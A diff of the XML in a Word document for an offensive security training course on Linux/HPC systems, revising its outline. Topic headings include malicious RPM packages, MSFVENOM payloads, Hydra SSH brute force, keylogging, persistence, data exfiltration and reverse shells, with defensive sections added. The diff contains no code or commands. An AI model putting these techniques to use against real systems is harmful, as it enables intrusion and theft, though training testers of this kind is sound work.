--- a/HPC Offensive Security Training Materials.docx
+++ b/HPC Offensive Security Training Materials.docx
@@ -773,6 +773,7 @@
                               <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                               <w:text/>
                             </w:sdtPr>
+                            <w:sdtEndPr/>
                             <w:sdtContent>
                               <w:p>
                                 <w:pPr>
@@ -917,7 +918,47 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>intended for experienced IT professionals who are familiar with the Linux operating system. Basic knowledge of basic penetration testing or external certifications such as OSCP are advantageous.</w:t>
+        <w:t xml:space="preserve">intended for experienced IT professionals who are familiar with the Linux operating system. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Proficiency </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">with a programming knowledge such as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Bash or Python is preferred </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">though not necessary as code is provided in the appendix. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Basic knowledge of basic penetration testing or external certifications such as OSCP are advantageous.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -971,38 +1012,410 @@
       <w:r>
         <w:t xml:space="preserve"> enumeration with </w:t>
       </w:r>
+      <w:r>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:t>etcraft</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The Wayback Machine</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Breached </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>How can I protect my organisation?</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Active reconnaissance</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Decoy </w:t>
+      </w:r>
+      <w:r>
+        <w:t>scan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ning </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">with </w:t>
+      </w:r>
+      <w:r>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ulnerability </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Scanners </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Shodan</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/Censys/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Natlas</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/NMAP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ping</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Port scanning with </w:t>
+      </w:r>
+      <w:r>
+        <w:t>NMAP</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/Scapy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Censys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defensive Measures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>External perimeter testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Offensive</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Python</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Firewall enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Client-side attacks </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">with </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Malicious </w:t>
+      </w:r>
+      <w:r>
+        <w:t>RPM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Packages</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Web Application Attacks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>How can I protect my organisation?</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Internal perimeter testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Internal firewalking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Living Off the Land (LOTL) Techniques</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exposing the internal network with SOCKS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Reverse proxies </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>transfer</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ring files</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Payload weaponi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>za</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tion</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with MSFVENOM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Breaching SSH with Hydra</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Discovering </w:t>
+      </w:r>
+      <w:r>
+        <w:t>IPv6 Host</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">SNMP </w:t>
+      </w:r>
+      <w:r>
+        <w:t>enumeration</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/exploitation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>User enumeration with SMTP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Null </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Bind </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">LDAP </w:t>
+      </w:r>
+      <w:r>
+        <w:t>reconnaissance</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Port scanning tactics </w:t>
+      </w:r>
+      <w:r>
+        <w:t>without NMAP/Netcat</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>VLAN Hopping with IPv6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>/dev/</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>etcraft</w:t>
+        <w:t>shm</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>as workspace</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>The Wayback Machine</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:t>Hiding command history</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>X11 Session Keylogging</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lack of GRUB Encryption</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>Active reconnaissance</w:t>
+        <w:t>Privilege escalation</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:r>
-        <w:t>Shodan</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> rules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1010,7 +1423,7 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Ping</w:t>
+        <w:t>Cronjobs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1018,19 +1431,7 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>NMAP</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>et</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cat</w:t>
+        <w:t>SUID binaries</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1038,16 +1439,7 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Censys</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>External perimeter testing</w:t>
+        <w:t>NFS Mounts</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1055,10 +1447,7 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Offensive</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Python</w:t>
+        <w:t>Internal services</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1066,323 +1455,9 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Firewall enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Host enu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>meration with pings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Client-side attacks </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">with </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Malicious </w:t>
-      </w:r>
-      <w:r>
-        <w:t>RPM</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Packages</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Internal perimeter testing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">This section focuses on internal </w:t>
-      </w:r>
-      <w:r>
-        <w:t>penetration testing</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, you would reach this stage </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">via phishing </w:t>
-      </w:r>
-      <w:r>
-        <w:t>or infil</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tration</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>from the external perimete</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">r </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by leveraging a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> public exploit </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">on a vulnerable service which is internet facing. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Internal firewalking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Living Off the Land (LOTL) Techniques</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Exposing the internal network with SOCKS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Reverse proxies </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>transfer</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ring files</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Payload weaponi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>za</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tion</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> with MSFVENOM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Breaching SSH with Hydra</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Discovering </w:t>
-      </w:r>
-      <w:r>
-        <w:t>IPv6 Host</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">SNMP </w:t>
-      </w:r>
-      <w:r>
-        <w:t>enumeration</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>User enumeration with SMTP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Null </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Bind </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">LDAP </w:t>
-      </w:r>
-      <w:r>
-        <w:t>reconnaissance</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Port scanning tactics </w:t>
-      </w:r>
-      <w:r>
-        <w:t>without NMAP/Netcat</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>VLAN Hopping with IPv6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>/dev/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>as workspace</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Hiding command history</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>X11 Session Keylogging</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lack of GRUB Encryption</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Privilege escalation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> rules</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cronjobs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>SUID binaries</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>NFS Mounts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Internal services</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:t>How can I protect my organisation?</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -1543,7 +1618,16 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Planting SSH keys</w:t>
+        <w:t xml:space="preserve">Planting SSH </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">public </w:t>
+      </w:r>
+      <w:r>
+        <w:t>keys</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1551,7 +1635,27 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Persistent system services</w:t>
+        <w:t xml:space="preserve">Persistent </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ystem</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ervices</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1559,7 +1663,27 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Poisoning the package manager</w:t>
+        <w:t xml:space="preserve">Poisoning the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ackage </w:t>
+      </w:r>
+      <w:r>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:t>anager</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>File transfer methods</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1567,22 +1691,55 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>D</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ata </w:t>
-      </w:r>
-      <w:r>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">xfiltration </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">with Web Cookies </w:t>
-      </w:r>
-      <w:r>
-        <w:t>in Python</w:t>
+        <w:t>Curl</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Python</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Perl</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>WGET</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Netcat/Nc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>OpenSSL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Bash</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1591,7 +1748,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>File transfer methods</w:t>
+        <w:t>Data exfiltration</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1599,7 +1756,7 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Curl</w:t>
+        <w:t>Web Cookies with Python</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1607,7 +1764,7 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Python</w:t>
+        <w:t>ICMP Covert Channels</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1615,94 +1772,25 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Perl</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>WGET</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Netcat/Nc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>OpenSSL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Bash</w:t>
+        <w:t>Encrypted Network Sockets</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
+      <w:r>
+        <w:t>Linux client side attacks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Linux Reverse shells</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Data exfiltration </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Web cookie</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>ICMP Covert Channels</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Encrypted Network Sockets</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Linux client side attacks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Linux Reverse shells</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
         <w:t>Bonus: Attacking Dell OS10</w:t>
       </w:r>
     </w:p>
@@ -1710,8 +1798,6 @@
       <w:r>
         <w:t>Local privilege escalation to establish internal foothold</w:t>
       </w:r>
-    </w:p>
-    <w:p>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
@@ -1719,59 +1805,33 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Scoping</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/Ethics</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Before the penetration test begins it is </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">very important the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">lead </w:t>
-      </w:r>
-      <w:r>
-        <w:t>penetration tester</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, supervising parties and </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the client </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">have meetings </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
         <w:t>OSINT</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
+      <w:r>
+        <w:t xml:space="preserve"> (Open Source Intelligence)</w:t>
+      </w:r>
+    </w:p>
